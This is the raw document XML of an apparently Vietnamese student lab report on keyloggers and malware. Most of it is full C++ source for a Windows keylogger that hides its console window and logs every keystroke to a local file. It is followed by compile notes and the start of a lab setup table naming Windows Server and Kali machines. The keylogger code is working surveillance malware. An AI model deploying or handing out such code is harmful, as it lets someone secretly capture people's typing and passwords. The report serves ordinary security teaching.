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1BE6A" w14:textId="4DA27168" w:rsidR="006F3006" w:rsidRPr="00A91CEB" w:rsidRDefault="006F3006" w:rsidP="006F30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CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Lê Hải Đăng - 20110243</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7932FE95" w14:textId="4F3D4876" w:rsidR="00B65F3C" w:rsidRPr="00A91CEB" w:rsidRDefault="00B65F3C" w:rsidP="00B65F3C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB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Lab 6: Keylogger &amp; </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA8EC32" w14:textId="77777777" w:rsidR="00B65F3C" w:rsidRPr="00A91CEB" w:rsidRDefault="00B65F3C" w:rsidP="00B65F3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6813FA53" w14:textId="36BB996D" w:rsidR="00CC3F22" w:rsidRPr="00A91CEB" w:rsidRDefault="002C47AF" w:rsidP="002C47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91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F9C170" w14:textId="6A67394D" w:rsidR="002C47AF" w:rsidRPr="00A91CEB" w:rsidRDefault="00962C84" w:rsidP="00962C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91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tạo keylogger bằng C++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE9A7FB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>#include &lt;iostream&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DE1EA6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>#include &lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084AB7AD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>#include &lt;winuser.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35751495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>#include &lt;fstream&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A35C76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>using namespace std;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011F0DE3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</w:p>
    <w:p w14:paraId="1F6469F9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>void StealthMode();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A424B40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>void StartLogging();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4DBAC5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</w:p>
    <w:p w14:paraId="1D02D190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>int main(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102E4B6B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StealthMode();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1013FF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StartLogging();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DC0C75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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED6B0C9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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D48BF0D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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD619C2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</w:p>
    <w:p w14:paraId="62A6FE9E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>void StartLogging(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B82D6C1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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        char c;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25757E69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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277F42E2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for(;;){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5835AF8B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9C405D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for(c=8;c&lt;=222;c++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5DF398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if(GetAsyncKeyState(c)==-32767){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E56F6D2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39479FA5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ofstream write("Record.txt", ios::app);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC4501E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054233D8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if(((c&gt;64)&amp;&amp;(c&lt;91))&amp;&amp;!(GetAsyncKeyState(0x10)) )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CB87A3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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361F4B76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c+=32;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699EC023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write&lt;&lt;c;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3DE97E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write.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04333409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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5FE5A8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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FA3432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else if((c&gt;64)&amp;&amp;(c&lt;91))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B15E05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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C70C952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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE83105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write&lt;&lt;c;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAD6BC1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write.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0B83EA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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D04F58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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7980CAAB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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEBEAF2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A1243F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switch (c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF87906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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4047C9D9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case 48:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D176E9D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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FB3C47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if(GetAsyncKeyState(0x10))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F442EF6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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CA4B90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    write&lt;&lt;")";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC1B5FD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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6FB395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    write&lt;&lt;"0";    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E491A99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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258E0D4A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A0A214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}   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E76BD13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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C403347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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FC1F88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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74527E3E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC20890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case 49:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCF2F7C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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105DAA93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if(GetAsyncKeyState(0x10))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74658D0F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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E17979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    write&lt;&lt;"!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FE0F11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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2794DF9C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    write&lt;&lt;"1";    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155334BF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341B4B65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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16282A86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}   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF41F70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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3966CD7A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E5873B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case 50:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B81A7F7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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38159E26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if(GetAsyncKeyState(0x10))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3060F58B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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B891E4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    write&lt;&lt;"@";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC19ABD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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175A265F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    write&lt;&lt;"2";    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787EB897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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307C6DE5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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3090B98B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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2ACAAF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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    case 51:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AE7676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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0703735F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if(GetAsyncKeyState(0x10))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6DC992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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DAB982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    write&lt;&lt;"#";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720B9766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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BC28D4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    write&lt;&lt;"3";    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7721C2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7756FA06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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC29D42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}   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B17C829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break;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A66CF46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case 52:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252A6601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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66980954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if(GetAsyncKeyState(0x10))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AADAF7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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429F34CF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    write&lt;&lt;"$";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B9C56F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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D8242B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    write&lt;&lt;"4";    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF04E60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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFBA106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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5D4F99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}   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C39A6A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    break;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3507BBD6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case 53:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BDC6BB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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7D9A12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if(GetAsyncKeyState(0x10))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108C8FD7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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B76E2C6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    write&lt;&lt;"%";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE6C490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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220F7AE4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    write&lt;&lt;"5";    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EA479B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C9E9CA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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711AB41C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}   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287C8C30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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1AC436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case 54:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E61CFE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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F2F9CB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if(GetAsyncKeyState(0x10))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48659918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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAEF7F8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    write&lt;&lt;"^";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6BE585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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4951060B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    write&lt;&lt;"6";    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4461AEF6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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7281DA79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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA73C41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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        }   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBF83D1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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A30F304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case 55:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E7D7AB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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33496E39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if(GetAsyncKeyState(0x10))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231655E7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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEA468D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    write&lt;&lt;"&amp;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A15B92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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6142F3C3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    write&lt;&lt;"7";    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608E6644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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F62428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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD5EA1F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}   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B838E11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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EDDDBE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case 56:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7060AB5F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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479B4456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if(GetAsyncKeyState(0x10))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A997594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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C407C8A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    write&lt;&lt;"*";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F6A8CE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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B6A52E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    write&lt;&lt;"8";    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EB8DFB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B2BFD6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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55764391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}   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350AEED0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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7872EE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case 57:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADE1EB4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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464CBE2D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if(GetAsyncKeyState(0x10))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09289593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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FED7FB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    write&lt;&lt;"(";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB09F22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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D5CB5E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    write&lt;&lt;"9";    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E7C444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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37614CDB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACE3378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}   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43994821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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A70E30B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C2FAA9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case VK_SPACE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E16DAD1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write&lt;&lt;" ";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD57153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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7069381E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case VK_RETURN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9AD53B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write&lt;&lt;"\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F2F580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break;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C10AC4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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    case VK_TAB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C6BDD2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write&lt;&lt;"  ";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6CF91A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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9D5627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case VK_BACK:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FEEBD1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write&lt;&lt;"&lt;BACKSPACE&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A955A4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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75474E90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case VK_DELETE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9DF049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write&lt;&lt;"&lt;Del&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0517F1AC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break;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029EFC19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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283A0FCB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default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567CA7E1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        write&lt;&lt;c; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07413803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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0E7353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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016B25C0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     }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0693EE20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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7422FE04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   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D77D439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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79157787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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47977ABE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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194C98E0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>void StealthMode(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9198A7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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    HWND stealth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E99F8E3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AllocConsole();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EDFB79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stealth=FindWindowA("ConsoleWindowClass",NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD53716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ShowWindow(stealth,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAF1091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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401B991D" w14:textId="77777777" w:rsidR="00E84740" w:rsidRPr="00A91CEB" w:rsidRDefault="00E84740" w:rsidP="00E8474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A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150E1FDC" w14:textId="55DE01C9" w:rsidR="00962C84" w:rsidRPr="00A91CEB" w:rsidRDefault="00E84740" w:rsidP="00E847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91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Compile code ta được file thực thi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F75B2E" w14:textId="339AB109" w:rsidR="007724D6" w:rsidRPr="00A91CEB" w:rsidRDefault="007724D6" w:rsidP="007724D6">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DC2DABC" wp14:editId="174E5835">
            <wp:extent cx="5839640" cy="304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808F" w14:textId="58B5CCE4" w:rsidR="007724D6" w:rsidRPr="00A91CEB" w:rsidRDefault="007724D6" w:rsidP="007724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91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ta gõ bất cứ phím nào thì Keylogger cũng bắt được và ghi vào file Record.txt cùng thư mục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518237D2" w14:textId="398FE9EB" w:rsidR="007724D6" w:rsidRPr="00A91CEB" w:rsidRDefault="004E3111" w:rsidP="007724D6">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="350307BB" wp14:editId="69A0320E">
            <wp:extent cx="5943600" cy="426339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AB32" w14:textId="47FE00C6" w:rsidR="00643DA9" w:rsidRPr="00A91CEB" w:rsidRDefault="00643DA9" w:rsidP="00643D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91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kết quả trong file Keylogger</w:t>
      </w:r>
      <w:r w:rsidR="00FA7723" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> khi gõ “</w:t>
      </w:r>
      <w:r w:rsidR="006F3006" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Le Hai Dang</w:t>
      </w:r>
      <w:r w:rsidR="00FA7723" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> – MSSV 20110</w:t>
      </w:r>
      <w:r w:rsidR="006F3006" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>243</w:t>
      </w:r>
      <w:r w:rsidR="00FA7723" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008D71AA" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C4CF6C" w14:textId="632DD193" w:rsidR="00643DA9" w:rsidRPr="00A91CEB" w:rsidRDefault="00A91CEB" w:rsidP="00643DA9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FCDEB89" wp14:editId="7A03FC7B">
            <wp:extent cx="5943600" cy="1551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B389" w14:textId="0EBF7974" w:rsidR="002C47AF" w:rsidRPr="00A91CEB" w:rsidRDefault="002C47AF" w:rsidP="002C47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91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C1353E" w14:textId="21BD13C3" w:rsidR="002D4804" w:rsidRPr="00A91CEB" w:rsidRDefault="00FE49E5" w:rsidP="002D4804">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Chuẩn bị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311"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="2790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE49E5" w:rsidRPr="00A91CEB" w14:paraId="3F86D115" w14:textId="77777777" w:rsidTr="00FE49E5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97C21" w14:textId="77777777" w:rsidR="00FE49E5" w:rsidRPr="00A91CEB" w:rsidRDefault="00FE49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A91CEB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Tên Thiết bị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AFAA" w14:textId="77777777" w:rsidR="00FE49E5" w:rsidRPr="00A91CEB" w:rsidRDefault="00FE49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A91CEB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Số lượng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EF701" w14:textId="77777777" w:rsidR="00FE49E5" w:rsidRPr="00A91CEB" w:rsidRDefault="00FE49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A91CEB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FE49E5" w:rsidRPr="00A91CEB" w14:paraId="248DC4D4" w14:textId="77777777" w:rsidTr="00FE49E5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FE5CD" w14:textId="4F91FFEF" w:rsidR="00FE49E5" w:rsidRPr="00A91CEB" w:rsidRDefault="00FE49E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91CEB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">PC Win </w:t>
            </w:r>
            <w:r w:rsidR="00DE375C" w:rsidRPr="00A91CEB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Server 2012</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26EFB4C7" w14:textId="5A11A4C8" w:rsidR="00FE49E5" w:rsidRPr="00A91CEB" w:rsidRDefault="00FE49E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91CEB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>(192.168.</w:t>
            </w:r>
            <w:r w:rsidR="003C2E66" w:rsidRPr="00A91CEB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>1.15</w:t>
            </w:r>
            <w:r w:rsidRPr="00A91CE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6FED3" w14:textId="77777777" w:rsidR="00FE49E5" w:rsidRPr="00A91CEB" w:rsidRDefault="00FE49E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91C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AB7E6" w14:textId="77777777" w:rsidR="00FE49E5" w:rsidRPr="00A91CEB" w:rsidRDefault="00FE49E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91CEB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE49E5" w:rsidRPr="00A91CEB" w14:paraId="5809F4F5" w14:textId="77777777" w:rsidTr="00FE49E5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4BD6C" w14:textId="67484A0D" w:rsidR="00FE49E5" w:rsidRPr="00A91CEB" w:rsidRDefault="00FE49E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91CEB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali </w:t>
            </w:r>
            <w:r w:rsidR="00D75CFF" w:rsidRPr="00A91CEB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
